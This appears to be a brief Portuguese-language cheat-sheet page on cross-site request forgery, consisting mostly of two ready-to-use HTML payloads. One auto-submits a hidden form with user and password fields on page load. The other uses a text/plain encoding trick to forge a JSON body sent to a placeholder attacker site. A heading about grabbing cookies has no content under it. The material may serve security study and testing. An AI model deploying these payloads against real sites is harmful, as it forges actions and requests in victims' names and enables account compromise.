CSRF
Auto Submit
POST com Formulário Comum
<html>
<body onload="document.getElementById('csrf').submit()">
<form id="csrf" action="http://ptl-409a305a-0389da50.libcurl.so/share" method="POST">
<input name="user" type="hidden" value="<user>" >
<input name="pass" type="hidden" value="<pass>" >
</form>
</body>
</html>Post JSON
<html>
<body onload="document.getElementById('csrf').submit()">
<form id="csrf" action="http://<hacker_site>" method="POST" enctype="text/plain">
<input name='{"user":"<user>","pass":"<pass>","fake":"' value='"}' >
</form>
</body>
</html>Pegando Cookies
Last updated